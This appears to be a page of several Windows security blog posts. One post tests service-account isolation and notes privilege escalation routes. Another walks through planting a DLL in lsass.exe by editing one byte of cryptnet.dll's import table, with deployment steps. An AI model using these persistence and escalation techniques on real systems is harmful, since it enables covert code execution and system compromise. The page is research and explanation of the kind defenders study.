The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.

What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

Per-Service SID

The first big addition in WSH was the Per-Service SID. This SID is automatically added to the group list of default groups shown previously by the SCM when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.

Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

- Type  : Allowed
- Name  : NT AUTHORITY\SYSTEM
- Access: Full Access

- Type  : Allowed
- Name  : OWNER RIGHTS
- Access: ReadControl

- Type  : Allowed
- Name  : NT SERVICE\CDPSvc
- Access: Full Access

The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703, as long as you have greater that 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

Write-Restricted Token

The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted token's have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted when ever an access check is performed. First the access check is run on the default group list, if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied. 

Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to setup correctly as it blocks all access equally including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone. 

In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

Everyone
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\SERVICE_NAME

The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.

And the Rest

There's a few things which are technically part of service hardening which won't really consider for the experiment:

The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

Experiment Procedure

On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

Step 1: Build an access token for a service which doesn't exist on the system.
Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
Step 3: Collate the results based on the type of resource and whether write access was granted.

The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
  • LOCAL SERVICE
  • LOCAL SERVICE, Write Restricted
  • NETWORK SERVICE
  • NETWORK SERVICE, Write Restricted
  • Control
We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably a trivial to get full system compromise through impersonate. We'd want to get a bigger picture however, it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact. 

It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

Experiment Procedure Detail

On to specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user, some command will need it (such as getting access tokens) others benefit for the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability on the number of services running at any one time, there's not a lot which can be done about that. However it's expected that the result should be same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

Creating the Access Tokens

We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

$tokens = @()
$tokens += Get-ServiceToken LocalService FakeService
$tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
$tokens += Get-ServiceToken NetworkService FakeService
$tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM as we're running on the same desktop we can just use the following command:

$tokens += Get-NtToken -Session -Duplicate

Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

Resource Checking and Result Collation

With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

First as way of example lets run checks for process and threads:

$ps = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ProcessOnly -AllowEmptyAccess
$ts = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ThreadOnly -AllowEmptyAccess

We can pass a list of tokens to the checking command, this improves performance as we only do the enumeration of resources for every token group then do the access check. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but we were not granted access.

Let's do the rest of the resources:

$os = Get-AccessibleObject \ -Recurse `
    -Tokens $tokens -AllowEmptyAccess
$fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
    -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
$ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
    -Tokens $tokens -AllowEmptyAccess

We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

Experiment Results

We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

TokenWritableWritable (WR)Total
Control99.83%N/A13171
Network Service65.00%0.00%300
Local Service62.89%0.70%574

As we expected the control token had almost 100% of the owned resources writable by the user.  However for the two service accounts both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token, there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting though there were ACL'ed to everyone which is unusual.

Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

TypeLS Writable%LS WritableNS Writable%NS Writable
Directory0.28%10.51%1
Event1.66%60.51%1
File74.24%26848.72%95
Key22.44%8149.23%96
Mutant0.28%10.51%1
Process0.28%10.00%0
Section0.55%20.00%0
SymbolicLink0.28%10.51%1
Thread0.00%00.00%0

The clear winners, if there is such a thing is Files and Registry Keys taking up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account granted WRITE_DAC access, or the inherited DACL will contain an OWNER CREATOR SID which results an explicit access for the service account.

What is perhaps more interesting is the results for Processes and Threads, neither NS or LS have any writable threads and only LS has a single writable process. This primary reason for the lack of writable threads and processes is due to the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has a OWNER RIGHTS SID granted only READ_CONTROL access, the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

<Owner>
 - Name  : NT AUTHORITY\LOCAL SERVICE

<DACL>
 - Type  : Allowed
 - Name  : NT SERVICE\Audiosrv
 - Access: Full Access

 - Type  : Allowed
 - Name  : NT AUTHORITY\Authenticated Users
 - Access: QueryLimitedInformation

The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.

If you look at the results one other odd thing you'll notice is that while there are readable threads there are no readable processes, what's going on? If we look at a normal LS service process' security descriptor we see the following:

<Owner>
 - Name  : NT AUTHORITY\LogonSessionId_0_202349

<DACL>
 - Type  : Allowed
 - Name  : NT AUTHORITY\LogonSessionId_0_202349
 - Access: Full Access

 - Type  : Allowed
 - Name  : BUILTIN\Administrators
 - Access: QueryInformation|QueryLimitedInformation

We should be able to see the reason, the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID, even administrators are apparently not the be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

Is there anything else interesting in writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directory, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack, you can compromise any service process running as the same used by dropping a mapping for the C: drive and waiting the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

Conclusions

Even though I've not run the experiment on multiple machines, at different times with different software I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources which provide trivial elevation routes but that can be easily compromised if there's appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running in with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary, however I don't work in MSRC so I have no influence on what is or is not fixed.

Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

Practical Reverse Engineering Solutions

27 December 2019 at 16:33
Hey, Here I save all the solutions to the windows kernel chapter of the practical reverse engineering book. The exercises in this book are pretty insightful. The target audience of these posts are: People that want to read cool stuff about windows kernel reverse engineering People that want to learn how to break down reverse engineering tasks effeciently People that actually do the exercises and need a reference to the solutions.

AuxKlibQueryModuleInformation

27 December 2019 at 16:33
In this article I’m going over the solution to reverse engineering AuxKlibQueryModuleInformation. This exercise is one of the easiest exercises in the book. Exercise: In the walk-through, we mentioned that a driver can enumerate all loaded modules with the documented API AuxKlibQueryModuleInformation. Does this API guarantee that the returned module list is always up-to-date? Explain your answer. Next, reverse engineer AuxKlibQueryModuleInformation on Windows 8 and explain how it works. How does it handle the case when multiple threads are requesting access to the loaded module list?

PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading

27 December 2019 at 03:56

Preface

In this post I describe a simple trick I came up with recently - something which is definitely nothing new, but as I found it useful and haven't seen it elsewhere, I decided to write it up.

What we want to achieve

So - let's consider backdooring a Windows executable with our own code by modifying its binary file OR one of its dependencies (so we are not talking about runtime code injection techniques or hooking,  neither about abusing known persistence features like AppInit DLLs and the like).

Most of us are familiar with execution flow hijacking combined with:

We probably heard of IAT hooking (in-memory), but how about on-disk?

Import Table and DLL loading

Both EXE and DLL files make use of a PE structure called Import Table, which is basically a list of external functions (usually just WinAPI) the program is using, along with the names of the DLL files they are located in. This list can be easily reviewed with any PE analysis/editing tool like LordPE, PEView, PEStudio, PEBear and so on:

An excerpt of the calc.exe Import table displayed in PEView

These are the runtime dependencies resolved by the Windows PE loader upon image execution, making the new process call LoadLibrary()  on each of those DLL files. Then the relevant entries for each individual function are replaced with with its current address within the just-loaded library (the GetProcAddress() lookup) - this is the normal and usual way of having this done, taken care by the linker during build and then by the Windows loader using the Import Table.

I need to mention that the process can as well be performed directly by the program (instead of using the Import Table), by calling both LoadLibrary() and then GetProcAddress(), respectively from its own code at some point (everyone who wrote a windows shellcode knows this :D). This second way of loading DLLs and calling functions from them is sometimes referred to as dynamic linking (e.g. required for calling native APIs) and in many cases is a suspicious indicator (often seen in malicious software).

Anyway, let's focus on the Import Table and how we can abuse it.

Getting right to it - hijacking the Import Table and creating the malicious PoC DLL

WARNING: Please avoid experimenting with this on a production system before you develop and test a working PoC, especially when dealing with native Windows DLLs (you could break your system, you've been warned). Do it on a VM after making a backup snapshot first.

So, without any further ado, let's say that for some reason (🤭) we would like to inject our code into lsass.exe.

Let's start with having a procmon look to see what DLLs does lsass.exe load:

A procmon filter for DLL loads performed by lsass.exe
The results once the filter is applied

Now, we are going to slightly modify one of these DLLs.

When choosing, preferably we should go after one that is not signed (as we want to chose one with high chances of being loaded after our modification).

But in this case, to my knowledge, they are all signed (some with embedded signatures - with the Digital Signatures tab visible in the explorer properties of the file, others signed in the C:\Windows\System32\catroot\).

The execution policy on this system, however, is unrestricted... oh wait, that's what I thought up until finishing up this write up, but then for diligence, I decided to actually make a screenshot (after seeing it I was surprised it worked, please feel free to try this at home):

ANYWAY - WE WANT to see what happens OURSELVES - instead of making self-limiting assumptions, so we won't let the presence of the signature deteriorate us. Also, in case system decides that integrity is more critical than availability and decides to break, we have a snapshot of the PoC development VM.

The second factor worth considering when choosing the target DLL is the presence of an Import Table entry we would feel convenient replacing (will become self-explanatory).

So, let's choose C:\Windows\System32\cryptnet.dll (sha256: 723563F8BB4D7FAFF5C1B202902866F8A0982B14E09E5E636EBAF2FA9B9100FE):

Now, let's view its Import Table and see if there is an import entry, which is most likely not used - at least during normal operations. Therefore such an entry is the most safe to replace (I guess now you see where this is going). We could as well ADD an import table entry, but this is a bit more difficult, introduces more changes into the target DLL and is beyond this particular blog post.

Here we go:

api-ms-win-core-debug-l1-1-0.dll with its OutputDebugStringA is a perfect candidate.

As Import Tables contain only one reference to each particular DLL name, all relevant functions listed in the Import Table simply refer to such DLL name within the table.

Hence, if we replace a DLL that has multiple function entries in the Import Table, we would have multiple functions to either proxy or lose functionality and risk breaking something (depending on how lazy we are).

Thus, a DLL from which only one function is imported is a good candidate. If the DLL+function is a dependency that has most likely already been resolved by the original executable before it loaded the DLL we are modifying, it's even better. If it is a function that is most likely not to be called during normal operations (like debugging-related functions), it's perfect.

Now, let's work on a copy of the target DLL and apply a super l33t offensive binary hacking technique - hex editor. First, let's find the DLL name (we simply won't care about the Import Table structure):

Searching for the DLL name in the Import Table using HxD

Got it, looks good:

Looks like we found it

Now, our slight modification:

Now, just changing ONE byte, that's all we need

So now our api-ms-win-core-debug-l1-1-0.dll became api-ms-win-code-debug-l1-1-0.dll.

Let's confirm the Import Table change in PEView:

Now, let's fire up our favorite software development tool and create api-ms-win-code-debug-l1-1-0.dll with our arbitrary code.

DevC++, new project, DLL, C

Using a very simple demo, grabbing the current module name (the executable that loaded the DLL) and its command line, appending it into a txt file directly on C: (so by default only high integrity/SYSTEM processes will succeed):

One thing, though - in order for the GetModuleFileNameA() function from the psapi library (psapi.h) to properly link after compilation, -lpsapi needs to be added to the linker parameters:

Code can be copied from here https://github.com/ewilded/api-ms-win-code-debug-l1-1-0/blob/master/dllmain.c.

OK, compile. Now, notice we used one export, called OutputFebugString (instead of OutputDebugString). This is because the linker would complain about the name conflict with the original OutputDebugString function that will get resolved anyway through other dependencies.

But since I wanted to have the Export Table in the api-ms-win-code-debug-l1-1-0.dll to match the entry from the cryptnet.dll Import Table, I edited it with HxD as well:

Fixing it

After:

Fixing it
Done

Normally we might want to test the DLL with rundll32.exe (but I am going to skip this part). Also, be careful when using VisualStudio, as it might produce an executable that by default will be x86 (and not x64) and for sure will produce an executable requiring visual C++ redistributables (even for a basic hello world-class application like this), while we might want to create portable code that will actually run on the target system.

What we are expecting to happen

We are expecting the lsass.exe process (and any other process that imports anything from cryptnet.dll) to load its tampered (by one byte!) version from its original location in spite of its digital signature being no longer valid (but again, lsass.exe and cryptnet.dll are just examples here).

We are also expecting that, once loaded, cryptnet.dll will resolve its own dependencies, including our phony api-ms-win-code-debug-l1-1-0.dll, which in turn, upon load (DllMain() execution) will execute our arbitrary code from within lsass.exe process (as well as from any other process that loads it, separately) and append our C:\poc.txt file with its image path and command line to prove successful injection into that process.

Deployment

OK, now we just need to deploy our version of cryptnet.dll (with the one Import Table entry hijacked with our phony api-ms-win-code-debug-l1-1-0.dll) along with our phony api-ms-win-code-debug-l1-1-0.dll itself into C:\Windows\System32\.

For this, obviously, we need elevated privileges (high integrity administrator/SYSTEM).

Even then, however, in this case we will face two problems (both specific to C:\Windows\System32\cryptnet.dll).

The first one is that C:\Windows\System32\cryptnet.dll is owned by TrustedInstaller and we (assuming we are not TrustedInstaller) do not have write/full control permissions for this file:

The easiest way to overcome this is to change the file ownership and then grant privileges:

The second problem we will most likely encounter is that the C:\Windows\System32\cryptnet.dll file is currently in use (loaded by multiple processes).

The easiest workaround for this is to first rename the currently used file:

Then deploy the new one (with hijacked Import Table), named the same as the original one (cryptnet.dll).

Below screenshot shows both new files deployed after having the original one renamed:

Showtime

Now, for diagnostics, let's set up procmon by using its cool feature - boot logging. Its driver will log events from the early stage of the system start process, instead of waiting for us to log in and run it manually. That boot log itself is, by the way, a great read:

Once we click Enable Boot Logging, we should see the following prompt:

We simply click OK.

Now, REBOOT!

And let's check the results.

This looks encouraging:

Oh yeah:

Let's run procmon to filter through the boot log. Upon running we should be asked for saving and loading the boot log, we click Yes:

Now, the previous filter (Process name is lsass.exe and Operation is Load Image) confirms that our phony DLL was loaded right after cryptnet.dll:

One more filter adjustment:

To once more confirm that this happened:

Why this can be fun

DLL side loading exploitation

This approach is a neat and reliable way of creating "proxy" DLLs out of the original ones (that differ by no more than one byte). Then we only might need to proxy one or few functions, instead of worrying about proxying all/most of them.

Persistence

Introducing injection/persistence of our own code into our favorite program's/service's EXE/DLL.

All with easy creation of the phony DLL (just write in C) and a simple byte replacement in an existing file, no asm required.

Windows Library Code

9 December 2019 at 12:00
Intro I thought I will make a guide about windows library code.. The target audience are beginners that want to understand more about windows reverse engineering, development and compilation. I tried to make this guide as simple as possible. A “Library” is a term used in computer science for a collection of pre-written code / variables. Libraries are pretty useful for developers because it saves development time. There are 2 types of libraries:
❌
❌